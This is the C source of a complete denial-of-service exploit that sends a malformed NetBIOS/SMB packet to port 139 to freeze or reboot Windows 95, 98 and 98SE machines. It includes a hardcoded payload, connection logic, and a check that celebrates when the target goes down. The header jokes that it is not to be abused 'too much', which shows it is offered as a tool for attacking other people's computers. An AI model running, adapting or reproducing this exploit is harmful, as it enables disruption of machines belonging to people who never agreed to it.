/*

Windows 95,98 and 98SE Denial Of Service.
   by koper <koper@linuxmail.org>
        

   Uses NetBIOS malformed packets
  to freeze/reboot remote mashine.

  Don't abuse ... @least not 2much
                
                 ;>

*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>		
#include <sys/socket.h>		
#include <sys/types.h>		
#include <netinet/in.h>		
#include <unistd.h>		
#include <string.h>		

#define PORT 139 //NetBIOS port ... ma sie rozumiec ;)

char kprcode[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x4f\x70\x65\x6e\x20\x59\x6f\x75\x72\x20"
"\x6d\x69\x6e\x64\x2e\x2e\x2e\x20\x61\x6e\x64\x20\x49\x20\x77\x69"
"\x6c\x6c\x20\x62\x65\x20\x74\x68\x65\x72\x65\x2e\x20\x6b\x70\x72\x0a";

struct samba_req
        {
        char first[5];  
        char yourname[32];
        char sep[2];
        char myname[32];
        char end[1];
        };

void name(char *name1, char *name2);

unsigned long int dns (char *host);

int main(int argc, char *argv[]){
char buf[4000], buf2[4000], myname[33], yourname[33];
struct sockaddr_in piggie;
int soc, soc2, connex, x, x2;
struct samba_req smbreq;
long temp;

printf("\n******************************************************\n");
printf("* Windows 95 && 98 Denial Of Service NetBIOS exploit *\n");
printf("* \t    by koper <koper@linuxmail.org>           *\n");
printf("******************************************************\n");
printf("        Version: 0.5 - Support for Windows 98 SE\n\n");

if (argc < 3) {
printf("Usage: %s <IP> <NetBIOS name>\n", argv[0]);
printf("NetBIOS name must be in uppercase!\n");
exit(1);}


name("KPR",myname); 
myname[30]='A';	         
myname[31]='D';

name(argv[2],yourname);
yourname[30]='A';
yourname[31]='D';
printf("[+] Trying %s as NetBIOS name %s...\n",argv[1],argv[2]);
printf("[+] Resolving...\n");
temp = dns(argv[1]);

piggie.sin_addr.s_addr = dns(argv[1]);
piggie.sin_family      = AF_INET;
piggie.sin_port        = htons(PORT);

printf("[+] %s resolved: OK...\n", argv[1]);
soc = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(soc,(struct sockaddr *)&piggie,sizeof(piggie)))<0){ perror("[+] Error"); exit(1);}

memset(buf,0,4000);
memset(buf2,0,4000);

memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5);
memcpy(smbreq.sep,"\x00\x20",2);              
memcpy(smbreq.end,"\x00",1);                  
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yourname,yourname,32);

write(soc,&smbreq,72);  
x=read(soc,buf,4000);   

if(x<1){ printf("[+] Oh my god! There's no responce !?!\n[+] Panic!\n");
        exit(1);}

if(buf[0]=='\x82') {
printf("[+] Got responce from remote host...\n");
printf("[+] Initialising attack...\n");}
else {printf("[+] No responce from remote machine (check NBname)...\n[+] Panic!\n");         exit(1);}

write(soc,&kprcode,72);  
x=read(soc,buf,4000);   
close(soc);
printf("[+] Packet SENT!\n");
printf("[+] Checking hostname...\n");

write(soc,&smbreq,72);
x2=read(soc,buf2,4000);

soc2=socket(AF_INET,SOCK_STREAM,0);
if(connect(soc2,(struct sockaddr *)&piggie,sizeof(piggie))<0)
printf("[+] Host is down... YEAH!\n\n");
else printf("[+] %s is still up, probably not vulnerable...\n\n",argv[1]);
}

void name(char *name1, char *name2)
{ char c, c1, c2;
  int i, len;
  len = strlen(name1);
  for (i = 0; i < 16; i++) {
    if (i >= len) {
     c1 = 'C'; c2 = 'A';
    } else {
      c = name1[i];
      c1 = (char)((int)c/16 + (int)'A');
      c2 = (char)((int)c%16 + (int)'A');
    }
    name2[i*2] = c1;
    name2[i*2+1] = c2;
  }
  name2[32] = 0;  
}


unsigned long int dns (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i==-1){
he=gethostbyname(host);
if(he==NULL){
printf("[+] Unable to resolve %s...\n[+] Panic!\n", host);
exit(0);
} else{return(*(unsigned long *) he->h_addr); }
return(i); }
}